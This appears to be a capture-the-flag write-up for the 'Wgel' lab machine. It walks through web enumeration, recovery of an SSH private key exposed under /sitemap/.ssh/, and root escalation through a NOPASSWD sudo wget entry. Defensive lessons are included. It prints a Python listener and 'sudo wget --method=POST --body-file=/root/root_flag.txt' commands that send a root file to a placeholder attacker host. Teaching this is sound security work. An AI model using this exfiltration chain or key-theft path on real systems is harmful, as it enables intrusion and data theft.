Wgel
Enumerate a deceptive default web page to uncover an exposed SSH
private key, establish user access, then abuse a privileged
wget binary to exfiltrate root-owned files over HTTP.
Objective #
Compromise the target host: identify the initial access path through web enumeration, establish a stable user shell via an exposed SSH private key, enumerate local privilege boundaries, and escalate to recover both the user and root flags through a reproducible, technically grounded workflow.
A two-service footprint (SSH + HTTP) typically means the web server
will yield credentials, keys, or hidden content that unlocks SSH.
The privilege escalation hinges on recognizing that
sudo wget is not a benign download allowance —
it is a root-context file-read-and-transmit primitive.
Learning Objectives #
- Perform disciplined initial reconnaissance against a minimal service surface.
- Distinguish between default placeholder content and operationally meaningful hidden content.
- Use directory enumeration to reveal non-linked web assets behind a stock landing page.
- Recognize the severity of exposed private keys in web-accessible directories.
- Validate and operationalize SSH key-based authentication from recovered material.
- Interpret `sudo -l` output as an attack surface map rather than a permissions list.
- Abuse `wget` as a privileged read-and-exfiltration primitive through HTTP POST body injection.
- Pivot cleanly when initial privilege escalation assumptions fail.
Skills Tested #
Attack Flow #
Target Identification
|
v
Nmap Service Recon
[SSH 22 + HTTP 80]
|
v
HTTP Inspection
[Default page + "Jessie" comment]
|
v
Directory Enumeration
[Discover /sitemap/]
|
v
Recursive Enumeration
[Expose /sitemap/.ssh/]
|
v
Recover id_rsa
[Download + validate key]
|
v
SSH as jessie
[Key-based authentication]
|
v
User flag + sudo -l
[NOPASSWD: /usr/bin/wget]
|
v
wget POST body-file exfil
[Root file -> attacker listener]
|
v
Capture /root/root_flag.txt
Methodology #
1 · Establish the External Attack Surface
The Action
Start with an Nmap scan using default scripts and service version detection to map the exposed service surface.
nmap -Pn -sC -sV 10.65.160.47
The Reasoning
This is the correct first move against an unknown host because it
provides three things simultaneously: port exposure, service
fingerprints, and common script-level metadata that often reveals
weak configuration. Using -Pn avoids host discovery
issues common in VPN-style lab environments. The -sC -sV
combination is appropriate on easy boxes because the service surface
is typically small and the additional context sharply reduces blind
trial-and-error.
The Findings
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Only two services are exposed. A two-service footprint usually means the intended path is not broad exploitation but focused enumeration of one service to gain access to the other. SSH looks like a post-discovery service rather than the initial entry point.
Thought Process
The working hypothesis at this point: the web server will yield credentials, keys, usernames, or hidden content that then unlocks SSH. Because SSH is exposed but unauthenticated, it is more likely the destination than the starting point.
2 · Validate the HTTP Surface and Inspect for Human Clues
The Action
curl -i http://10.65.160.47/
curl -i http://10.65.160.47/robots.txt
The Reasoning
Before running brute-force directory discovery, validate the application behavior directly. This establishes a baseline response, confirms whether the root is a real application or placeholder, and sometimes exposes comments or linked paths that influence later enumeration.
The Findings
The root returned the standard Apache Ubuntu default page.
robots.txt returned 404 Not Found. However,
inside the HTML there was a notable comment:
<!-- Jessie don't forget to udate the webiste -->
This comment reveals three things: the default page is not the whole story, a human named Jessie likely maintains content on this host, and a future SSH username candidate has just appeared. Comments in default pages often look trivial, but they can reveal operator names, staging notes, deployment mistakes, or hidden content paths.
Thought Process
The hypothesis evolved from “this is just a default web page” to “this host probably has unlinked content that the operator failed to expose cleanly.” That justified moving into directory enumeration.
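Harvesting such clues can be done systematically rather than by eyeballing page source. The sketch below pulls every HTML comment out of a response body with Python's `re` module; the sample string stands in for the fetched page, and the function name is illustrative:

```python
import re

def extract_html_comments(html: str) -> list[str]:
    # Non-greedy match with DOTALL so comments spanning lines are caught
    return [c.strip() for c in re.findall(r"<!--(.*?)-->", html, re.DOTALL)]

# Sample body standing in for `curl http://TARGET/` output
page = """
<html><body>
<h1>Apache2 Ubuntu Default Page</h1>
<!-- Jessie don't forget to udate the webiste -->
</body></html>
"""

print(extract_html_comments(page))
```

In practice the same filter can be fed from `curl -s` output across every discovered page, so operator notes like the one above never go unnoticed.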
3 · Enumerate Hidden Web Content
The Action
gobuster dir -u http://10.65.160.47/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 \
-t 20 -q
The Reasoning
The site root looked intentionally misleading. Directory brute-forcing is the correct follow-up because HTTP servers commonly host unlinked resources, alternate site roots, staging directories, backups, or administrative content not referenced from the landing page. The tuned flags matter:
- `-b 403,404`: reduces noise from forbidden and missing responses
- `-x php,txt,html`: widens coverage for common file-backed assets
- `-q`: reduces verbosity so high-value hits are more visible
The Findings
/sitemap (Status: 301) [--> http://10.65.160.47/sitemap/]
/sitemap/ was not a search-engine sitemap artifact; it
was a hidden content directory hosting an entirely different site
tree. This was the first real pivot point.
Thought Process
Treat /sitemap/ as the true application root and repeat
content discovery there. The naming itself suggested a manually
published directory rather than a hardened application path.
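For intuition, the core loop of a directory brute-forcer can be sketched in a few lines of Python. This is a simplified stand-in for gobuster, not the real tool; the `fetch` parameter is injectable purely so the filtering logic can be exercised offline, and note that `urlopen` follows redirects by default, which gobuster does not:

```python
from urllib import request, error

def probe(base_url: str, words: list[str], fetch=None) -> list[tuple[str, int]]:
    """Return (word, status) pairs that survive a -b 403,404 style filter."""
    def default_fetch(url: str) -> int:
        try:
            with request.urlopen(url, timeout=5) as resp:
                return resp.status
        except error.HTTPError as e:
            return e.code

    fetch = fetch or default_fetch
    hits = []
    for word in words:
        status = fetch(f"{base_url.rstrip('/')}/{word}")
        if status not in (403, 404):   # mirror gobuster's -b 403,404
            hits.append((word, status))
    return hits
```

The value of the blacklist flags is visible here: without the `not in (403, 404)` filter, every wordlist miss would land in the results.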
4 · Enumerate the Hidden Site Tree
The Action
curl -i http://10.65.160.47/sitemap/
gobuster dir -u http://10.65.160.47/sitemap/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 \
-t 20 -q
The Reasoning
Whenever a second web root appears, it should be treated as a fresh target. Even if it is static content, the structure may expose sensitive directories, weak permissions, or artifacts left by deployment tooling.
The Findings
The second enumeration exposed multiple application assets and one critically suspicious result:
/.ssh (Status: 301) [--> http://10.65.160.47/sitemap/.ssh/]
A .ssh directory should never be
web-accessible. This is a severe operational mistake that likely
exposes authentication material directly to any HTTP client.
Thought Process
The attack hypothesis became very strong: if the .ssh
directory is indexed or misserved, there is a realistic chance of
credential material being publicly exposed.
5 · Recover the Exposed SSH Private Key
The Action
curl -i http://10.65.160.47/sitemap/.ssh/
curl http://10.65.160.47/sitemap/.ssh/id_rsa -o id_rsa
chmod 600 id_rsa
ssh-keygen -y -f id_rsa
The Reasoning
Directory listing confirms not just that a path exists, but exactly
what assets are inside it. Once id_rsa is visible, key
recovery becomes the obvious path. Validating the key with
ssh-keygen -y is a best practice because it proves the
file is structurally sound before using it operationally.
The Findings
Index of /sitemap/.ssh
id_rsa
The private key was retrievable directly over HTTP.
Exposed private keys are not “sensitive files” in the generic sense; they are authentication objects. Their exposure often converts directly into shell access without any further exploitation required.
Thought Process
The remaining question was not whether the key mattered, but which
user it matched. The earlier Jessie comment made
jessie the leading candidate.
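Before even running `ssh-keygen -y`, a quick structural sanity check catches the common failure mode of saving an HTML error page under the name `id_rsa`. A minimal sketch, assuming only the two PEM headers OpenSSH commonly writes to disk (the marker list is not exhaustive):

```python
def looks_like_private_key(data: bytes) -> bool:
    # The two on-disk headers OpenSSH commonly emits
    markers = (b"-----BEGIN OPENSSH PRIVATE KEY-----",
               b"-----BEGIN RSA PRIVATE KEY-----")
    return data.lstrip().startswith(markers)

# A 404 page downloaded by mistake fails the check immediately
print(looks_like_private_key(b"<html>404 Not Found</html>"))  # False
```

`ssh-keygen -y` remains the authoritative validation; this only filters out obviously wrong downloads before touching file permissions.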
6 · Establish SSH Access
The Action
ssh -i id_rsa jessie@10.65.160.47
On first connection, review the SSH host key fingerprint when prompted and accept it only if it matches the expected server.
Then run immediate enumeration:
id
hostname
pwd
ls -la ~
sudo -l
The Reasoning
Once a probable username is available, SSH is the highest-value next step because it moves the attack from remote content discovery into authenticated local enumeration, drastically increasing visibility and shortening the path to both flags.
The Findings
Authentication succeeded as jessie. The host was
CorpOne, and the account belonged to multiple standard
local groups including sudo. The most important output:
User jessie may run the following commands on CorpOne:
(ALL : ALL) ALL
(root) NOPASSWD: /usr/bin/wget
The sudo -l output is more important than any
filesystem loot at this stage. It provides a root-execution-capable
utility without a password prompt — effectively announcing
the privilege escalation vector.
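Reading `sudo -l` output as an attack surface map can even be mechanized. The sketch below extracts every `NOPASSWD` binary from output shaped like the finding above; it is a simplified parser for this line format, not a full sudoers grammar:

```python
import re

def nopasswd_binaries(sudo_l_output: str) -> list[str]:
    # Capture everything after each NOPASSWD: tag; entries are comma-separated
    bins = []
    for line in sudo_l_output.splitlines():
        m = re.search(r"NOPASSWD:\s*(.+)", line)
        if m:
            bins.extend(p.strip() for p in m.group(1).split(","))
    return bins

output = """\
User jessie may run the following commands on CorpOne:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
"""
print(nopasswd_binaries(output))   # ['/usr/bin/wget']
```

Each binary returned is then a candidate to check against known living-off-the-land abuse patterns.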
Thought Process
Two immediate goals remained:
- Find the user flag.
- Determine how to convert privileged `wget` into controlled root file access.
7 · Recover the User Flag
The Action
find /home /var/www -maxdepth 3 \( -name user.txt -o -name '*.txt' \) 2>/dev/null | sort
cat /home/jessie/Documents/user_flag.txt
The Reasoning
In CTF-style Linux targets, user flags are usually stored under the home directory but not always under a conventional filename. Searching a bounded path depth avoids unnecessary system noise while still covering likely locations.
The Findings
The user flag was stored at /home/jessie/Documents/user_flag.txt.
8 · Attempt Direct Root File Read via wget
The Action
sudo /usr/bin/wget -O- file:///root/root.txt
The Reasoning
This is the fastest hypothesis test. If the binary can interpret
file:// URLs under root context, the privilege
escalation collapses into a one-liner. Always test the simplest path
first.
The Findings
file:///root/root.txt: Unsupported scheme 'file'.
The command failed. This meant wget would not provide a
direct local-file retrieval path through that syntax.
A common mistake here is seeing a powerful network tool under sudo and assuming the simplest local URL handler will work. Capabilities differ across versions and utilities. The failure does not invalidate the exploitability of wget; it only invalidates one specific interface.
Thought Process
The next question: how else can wget be made to touch a
root-owned file and transmit its contents? The answer lies in
wget’s ability to read local files as HTTP request
bodies.
9 · Convert wget into a Root File Exfiltration Primitive
The Action
Stand up a local HTTP listener that records POST bodies, then instruct
target-side wget to issue an HTTP POST whose body is
read from a root-owned file.
Attacker-side listener:
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        with open("post_body.bin", "wb") as f:
            f.write(body)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok\n")

    def log_message(self, format, *args):
        return

HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
Start the listener:
python3 post_server.py
Target-side exfiltration:
sudo /usr/bin/wget --method=POST \
--body-file=/root/root_flag.txt \
http://<ATTACKER_IP>:8000/ -O-
The Reasoning
This is the critical exploit step. When wget runs under
sudo, it executes as root. The --body-file
option instructs it to open a local file and use the file contents as
the HTTP request body. This creates a three-stage privilege abuse
chain:
| Stage | Behavior | Result |
|---|---|---|
| `sudo` elevation | `wget` runs with UID 0 | Root permissions apply to all file operations |
| `--body-file=/root/root_flag.txt` | `wget` opens a root-owned file locally | Protected content becomes readable by the process |
| `http://attacker:8000/` | `wget` sends an outbound POST request | File content leaves the host to the attacker listener |
This is not shell escape in the classic sense. It is
capability abuse: a privileged network client is
repurposed into a controlled file exfiltration mechanism.
wget bridges two trust boundaries simultaneously
— privileged local file system access and remote network
transmission — which is exactly why it should never be
granted unrestricted NOPASSWD execution.
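What `--body-file` does is easy to reproduce, which makes the primitive concrete: read a local file, then ship its raw bytes as a POST body. A minimal Python sketch of the same behavior (the function name and URL are illustrative, not part of wget):

```python
from pathlib import Path
from urllib import request

def post_file(path: str, url: str) -> bytes:
    # Same idea as `wget --method=POST --body-file=PATH URL`:
    # the file's raw bytes become the HTTP request body.
    body = Path(path).read_bytes()
    req = request.Request(url, data=body, method="POST")
    with request.urlopen(req) as resp:
        return resp.read()
```

Run under root with `path="/root/root_flag.txt"` and `url` pointing at the listener, this reproduces the exploit exactly. Nothing here is exotic: file read plus outbound POST is the entire capability being abused.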
The Findings
The first path guess /root/root.txt failed because the
file did not exist. The adjusted path
/root/root_flag.txt succeeded, and the listener captured
the flag body.
Rabbit Holes & Pivots #
Not every path leads forward. Documenting failures is as important as documenting successes — each dead end refined the attack model.
1. Wrong Wordlist Location on Ubuntu
Initially assumed a Kali-like path (/usr/share/wordlists/...)
that did not exist on this Ubuntu-based environment. The path did not
exist and gobuster returned a file error immediately.
Pivot: inspected available shared directories,
identified /usr/share/dirb/wordlists/common.txt, and
resumed enumeration successfully.
2. Noisy Directory Enumeration
An early gobuster run timed out and produced low-value
noise, dominated by repetitive 403-style responses rather than
meaningful application paths.
Pivot: suppressed 403 and
404 output with -b 403,404, reran the scan,
and surfaced the important /sitemap/ hit more clearly.
3. Malformed Local Copy of the Private Key
A manually reconstructed copy of the key caused an SSH-side
libcrypto parsing error. OpenSSH failed before
authentication with a format error rather than an access-control error.
Pivot: redownloaded the key directly from the target
with curl, verified it with ssh-keygen -y,
and retried authentication successfully.
4. Unsupported file:// Scheme in wget
The attempt to read /root/root.txt via
file:// failed because the installed wget
did not support that scheme for this abuse path.
Pivot: reframed wget as a transport
tool rather than a local URL reader, and used
--body-file with an outbound POST instead.
5. Wrong Root Flag Filename
The first exfiltration attempt used /root/root.txt and
failed because the file was named differently on this host.
Pivot: adjusted to
/root/root_flag.txt and captured the correct file
successfully.
Deep Dives #
Why Web Enumeration Still Matters on a “Default Page” Target
The site initially presented a generic Apache landing page — exactly the sort of condition that causes inexperienced operators to under-enumerate. In reality, default pages often coexist with hidden directories, alternate content roots, staging material, or forgotten deployments.
The key lesson is that HTTP response content and server role are not the same thing. A default page only proves what is mapped to the current visible route, not what exists elsewhere in the document tree.
| Observation | Technical Meaning | Operational Implication |
|---|---|---|
| Apache default page | The visible root is a stock placeholder | Hidden content may exist in sibling paths |
| Human comment mentioning Jessie | A real operator touched the page | Unpublished or weakly published content likely exists |
| `301` redirect to `/sitemap/` | Alternate content root exists | Enumerate recursively from the new root |
| `.ssh/` web path exposed | File permissions or publication boundaries are broken | Credential material may be directly recoverable |
Enumeration is not about “running tools” — it is about disproving assumptions. The assumption that “default page means nothing here” was wrong, and disciplined enumeration exposed the real attack path.
Why sudo wget Is a Privileged File Exfiltration Primitive
Many defenders understand why sudo vim,
sudo less, or sudo tar can be dangerous.
Fewer immediately recognize why sudo wget is also
dangerous. The issue is not just downloading — it is
capability composition.
| Capability | Security Relevance |
|---|---|
| Can open local files for request bodies | Reads local data in the security context it runs under |
| Can send HTTP requests outbound | Transmits attacker-selected data to attacker-selected destinations |
| Can be run as root via `sudo` | Converts file access from user scope to root scope |
| Does not require an interactive shell | Provides meaningful privilege abuse without classic shell escape |
This is a classic example of a boundary-crossing utility: boundary 1 is privileged local file system access, boundary 2 is remote network transmission. When a single tool spans both boundaries under root authority, sensitive data can be exfiltrated even without a root shell.
Least privilege must be evaluated by capabilities,
not by how “harmless” a tool sounds. A downloader that
can read local files and talk to the network is not harmless under
sudo.
Defensive Lessons #
1. Never Expose .ssh Material Through the Web Server
- Keep user home directories and web roots strictly segregated.
- Disable directory indexing unless explicitly required.
- Add web server deny rules for hidden files and sensitive path patterns such as `.ssh`, `.git`, and backup files.
- Run periodic content audits to identify credential material under document roots.
2. Treat Private Key Exposure as Immediate Credential Compromise
- Rotate exposed keys immediately.
- Review `authorized_keys`, SSH logs, and network access records.
- Enforce passphrase-protected keys where possible.
- Prefer separate deployment credentials over personal user credentials.
3. Harden sudoers by Capability, Not Name
- Do not allow general-purpose network tools such as `wget` or `curl` with unrestricted `NOPASSWD` execution.
- If automation requires downloads, constrain the command path, arguments, destination, and user context tightly.
- Use wrapper scripts with fixed behavior instead of raw binary allowances.
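As a sketch of the wrapper-script idea, the snippet below pins scheme, host, and destination directory regardless of caller input, so a sudoers entry for it grants only one narrow behavior. The host `updates.example.internal` and the cache path are placeholder assumptions, not values from this environment:

```python
#!/usr/bin/env python3
"""Fixed-behavior download wrapper intended for a sudoers entry,
instead of granting raw wget. Host and paths are illustrative."""
import sys
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import urlopen

ALLOWED_HOST = "updates.example.internal"         # assumed internal mirror
DEST_DIR = Path("/var/cache/approved-downloads")  # fixed destination

def main(url: str) -> int:
    parsed = urlparse(url)
    # Refuse anything outside the pinned scheme/host policy
    if parsed.scheme != "https" or parsed.hostname != ALLOWED_HOST:
        print("refused: URL outside policy", file=sys.stderr)
        return 1
    name = Path(parsed.path).name or "download"
    dest = DEST_DIR / name          # caller cannot choose the directory
    with urlopen(url, timeout=30) as resp:
        dest.write_bytes(resp.read())
    print(f"saved {dest}")
    return 0

if __name__ == "__main__" and len(sys.argv) == 2:
    sys.exit(main(sys.argv[1]))
```

Because the wrapper accepts only a URL and decides everything else itself, options like `--body-file` simply have no equivalent for an attacker to reach.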
4. Detect Outbound Abuse Patterns
- Monitor unusual outbound HTTP requests from internal hosts.
- Alert on privileged processes initiating network connections unexpectedly.
- Correlate `sudo` events with outbound traffic for high-confidence detections.
5. Reduce Information Leakage in Web Content
- Remove developer comments from production HTML.
- Review static content for names, environment references, or deployment hints.
- Use automated secret scanning in CI/CD pipelines for web-published artifacts.
Common pitfalls: assuming a default page means nothing is hosted; skipping recursive enumeration on discovered subdirectories; failing to validate recovered key integrity before use; treating `wget` as a harmless download tool under `sudo`; not monitoring for privileged outbound network activity.
Full Reproduction Path #
The following is the clean, successful path without exploratory mistakes.
1. Service reconnaissance: `nmap -Pn -sC -sV 10.65.160.47` identifies SSH on 22 and HTTP on 80.
2. HTTP inspection: retrieve the web root with `curl`; note the `Jessie` comment in the page source.
3. Root directory enumeration: run `gobuster` against `/`; discover `/sitemap/`.
4. Recursive enumeration: run `gobuster` against `/sitemap/`; discover `/.ssh/`.
5. Key recovery: download `id_rsa` from `/sitemap/.ssh/`; validate with `ssh-keygen -y`.
6. SSH authentication: `ssh -i id_rsa jessie@10.65.160.47` confirms access.
7. User flag recovery: `cat /home/jessie/Documents/user_flag.txt`.
8. Privilege enumeration: `sudo -l` reveals `NOPASSWD: /usr/bin/wget`.
9. Root flag exfiltration: start the attacker-side listener, then run `sudo wget --method=POST --body-file=/root/root_flag.txt http://ATTACKER:8000/ -O-`.
10. Capture the root flag: read `post_body.bin` on the attacker machine.
Commands Reference #
Reconnaissance
nmap -Pn -sC -sV 10.65.160.47
curl -i http://10.65.160.47/
Directory Enumeration
gobuster dir -u http://10.65.160.47/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 -t 20 -q
gobuster dir -u http://10.65.160.47/sitemap/ \
-w /usr/share/dirb/wordlists/common.txt \
-x php,txt,html \
-b 403,404 -t 20 -q
Credential Recovery & Initial Access
curl http://10.65.160.47/sitemap/.ssh/id_rsa -o id_rsa
chmod 600 id_rsa
ssh-keygen -y -f id_rsa
ssh -i id_rsa jessie@10.65.160.47
User Enumeration & Flag
find /home /var/www -maxdepth 3 \( -name user.txt -o -name '*.txt' \) 2>/dev/null | sort
cat /home/jessie/Documents/user_flag.txt
sudo -l
Privilege Escalation via wget
Attacker-side listener (post_server.py):
from http.server import BaseHTTPRequestHandler, HTTPServer

class Handler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)
        with open("post_body.bin", "wb") as f:
            f.write(body)
        self.send_response(200)
        self.end_headers()
        self.wfile.write(b"ok\n")

    def log_message(self, format, *args):
        return

HTTPServer(("0.0.0.0", 8000), Handler).serve_forever()
Start it:
python3 post_server.py
Target-side exfiltration:
sudo /usr/bin/wget --method=POST \
--body-file=/root/root_flag.txt \
http://<YOUR_TUN0_IP>:8000/ -O-
Read the captured body:
python3 -c "from pathlib import Path; print(Path('post_body.bin').read_bytes().decode())"
Flags #
The room is easy by design, but the lessons are real: a single
exposed private key can invalidate an otherwise small attack
surface, and a single careless sudoers entry can
convert limited user access into root data exposure without ever
requiring a full interactive root shell.